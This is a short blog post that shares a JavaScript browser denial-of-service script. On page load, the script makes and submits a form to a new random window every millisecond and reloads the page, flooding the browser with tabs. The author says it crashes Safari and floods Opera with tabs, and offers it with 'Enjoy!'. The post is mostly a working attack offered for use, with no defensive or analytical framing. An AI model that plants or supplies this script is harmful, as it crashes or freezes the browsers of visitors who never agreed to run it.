Published 18 years 6 months ago • Last updated March 22, 2025 • ⏱️ < 1 min read
This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! :)
<pre lang="javascript"> <script type="text/javascript"> window.onload = function() { setInterval('spawn()',1); } function spawn() { frm = document.createElement('form'); frm.target = 'x' + Math.round(Math.random() * 100000); frm.method = 'GET'; frm.action = '?'; document.body.appendChild(frm); frm.submit(); self.location.reload(); } </script> </pre>